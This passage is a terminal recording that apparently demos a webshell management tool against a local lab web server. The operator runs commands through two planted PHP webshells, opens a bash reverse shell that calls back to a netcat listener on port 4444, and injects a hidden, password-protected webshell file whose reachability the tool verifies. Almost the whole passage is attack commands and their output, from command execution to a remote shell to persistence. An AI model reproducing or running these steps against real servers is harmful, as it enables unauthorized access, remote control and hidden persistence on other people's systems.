\u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[45.0684, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_PASS root\u001b[15D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.1298, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.1913, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102msions\u001b[0m\u001b[K\u001b[5D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.253, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.3146, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.3767, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.4382, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.5, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.5614, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.6236, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.6852, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-c\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.7467, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.8085, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.87, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.9317, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32msessions\u001b[0m \u001b[0;31m-c\u001b[0m \u001b[0;33mid\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[45.9324, "o", "\u001b[95m[+] [broadcast] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[45.9356, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[45.9357, "o", "\u001b[95m[+] [broadcast] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[45.9483, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n"]
[45.9489, "o", "\u001b[6n"]
[45.9499, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.951, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.3396, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Reverse shell \u2014 connects back via LHOST/LPORT from the datastore  \u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[50.1476, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[0;38;2;102;102;102mivot db\u001b[7D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.209, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.2705, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.332, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.3935, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.4554, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.517, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.5793, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.6416, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.7039, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.7663, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.8287, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.8908, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[50.9525, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-m\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0141, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.0764, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1383, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.1998, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.2613, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.323, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.3846, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.4462, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.5079, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.5696, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.6313, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.6929, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.7545, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.8161, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.8777, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[51.9393, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.0013, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.063, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.1246, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.1863, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.2479, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.3097, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.3715, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.4332, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[52.4949, "o", "\u001b[?25l\u001b[?7l\u001b[67D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mshell\u001b[0m \u001b[0;31m-m\u001b[0m \u001b[0;33mbash\u001b[0m \u001b[0;31m--listen\u001b[0m \u001b[0;31m--tool\u001b[0m \u001b[0;33mnc\u001b[67D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[52.4958, "o", "\u001b[1;32m[+] Listening on :4444 (nc); the shell should connect shortly.\u001b[0m\r\n"]
[52.4979, "o", "Listening on 0.0.0.0 4444\r\n"]
[53.4999, "o", "\u001b[1;32m[+] Trying bash reverse shell (/usr/bin/bash) -> 172.16.1.1:4444\u001b[0m\r\n"]
[53.5073, "o", "Connection received on 172.16.1.5 59486\r\n"]
[53.5076, "o", "sh: 0: can't access tty; job control turned off"]
[53.5076, "o", "\r\n"]
[53.5076, "o", "$ "]
[55.4946, "o", "i"]
[55.5549, "o", "d"]
[55.6151, "o", "\r\n"]
[55.616, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[55.616, "o", "$ "]
[57.1208, "o", "u"]
[57.181, "o", "n"]
[57.2412, "o", "a"]
[57.3014, "o", "m"]
[57.3616, "o", "e"]
[57.4218, "o", " "]
[57.482, "o", "-"]
[57.5422, "o", "a"]
[57.6026, "o", "\r\n"]
[57.6032, "o", "Linux 5dd92056d40a 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May  5 19:26:24 UTC 2026 x86_64 GNU/Linux\r\n$ "]
[59.3086, "o", "e"]
[59.3688, "o", "x"]
[59.429, "o", "i"]
[59.4892, "o", "t"]
[59.5494, "o", "\r\n"]
[59.5505, "o", "\u001b[6n"]
[59.5515, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[59.5523, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[61.0571, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Switch session & inject \u2014 drive session 1, drop a new shell  \u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[62.8647, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102messions -c id\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[62.9269, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[62.9892, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.0515, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.1137, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.1758, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.2381, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.3002, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;32msessions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.3622, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.4242, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.4865, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m-i\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.5481, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.6097, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.6713, "o", "\u001b[?25l\u001b[?7l\u001b[42D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32msessions\u001b[0m \u001b[0;31m-i\u001b[0m \u001b[0;33m1\u001b[42D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[63.6719, "o", "\u001b[1;32m[+] Active session -> [1] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[63.6724, "o", "\u001b[6n"]
[63.673, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[63.6738, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.2809, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.3431, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.4053, "o", "\u001b[?25l\u001b[?7l\u001b[0mj\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.4674, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.5293, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.5915, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32minject\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.6538, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.7159, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.7782, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.8403, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.9031, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[65.9653, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.0275, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.0898, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.152, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.2135, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.2751, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.3366, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.3982, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.4598, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.5215, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.5831, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.6448, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.7065, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.7683, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.83, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.8916, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[66.9532, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.0148, "o", "\u001b[?25l\u001b[?7l\u001b[57D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html > \u001b[0;32minject\u001b[0m \u001b[0;33mweb\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33ms3cr3t\u001b[57D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.0148, "o", "\u001b[?2004l"]
[67.0159, "o", "\u001b[95m[+] [inject] POST http://127.0.0.1:8080/c2.php (password='c')\u001b[0m\r\n"]
[67.0212, "o", "\u001b[1;32m[+] Injected: http://127.0.0.1:8080/.cNaQORqDdrxRstxW.php (password=s3cr3t)\u001b[0m\r\n"]
[67.0227, "o", "\u001b[1;32m[+] Verified reachable: http://127.0.0.1:8080/.cNaQORqDdrxRstxW.php\u001b[0m\r\n"]
[67.0232, "o", "\u001b[6n"]
[67.0239, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[67.0247, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[69.2331, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[69.2945, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[69.3559, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[69.4174, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[69.4789, "o", "\u001b[?25l\u001b[?7l\u001b[33D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [1] /var/www/html > \u001b[0;32mquit\u001b[33D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[69.4794, "o", "\u001b[95m[+] Saved session (2 shell(s)) to \u001b[0m\r\n\u001b[95m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/session_1782522518.json\u001b[0m\r\n"]
